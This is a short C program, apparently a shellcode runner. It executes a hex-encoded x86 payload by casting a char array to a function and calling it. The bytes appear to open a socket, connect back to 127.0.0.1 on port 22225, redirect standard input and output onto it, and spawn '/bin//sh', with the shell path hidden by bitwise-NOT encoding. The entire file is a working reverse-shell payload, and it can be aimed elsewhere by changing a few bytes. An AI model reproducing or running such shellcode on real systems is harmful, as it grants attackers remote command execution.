int main()
{
    char sc[] = "\xF7\xE3\x53\x43\x53\x6A\x02\xB0\x61\xCD\x80\x50\x5F\x6A\x10\x68\x7F\x00\x00\x01\x68\x02\x00\x56\xD1\x50\x6A\x62\x58\xCD\x80\x6A\x03\x59\x22\x51\x57\x6A\x5A\x58\xCD\x80\x49\x83\xF8\x00\x75\xF3\x50\x68\xD0\xD0\x8C\x97\x58\xF7\xD0\x50\x68\xD0\x9D\x96\x91\x58\xF7\xD0\x50\x31\xC0\x89\xE3\x50\x53\x6A\x3B\x58\xCD\x80";
    (*(void(*)())sc)();
    return 0;
}
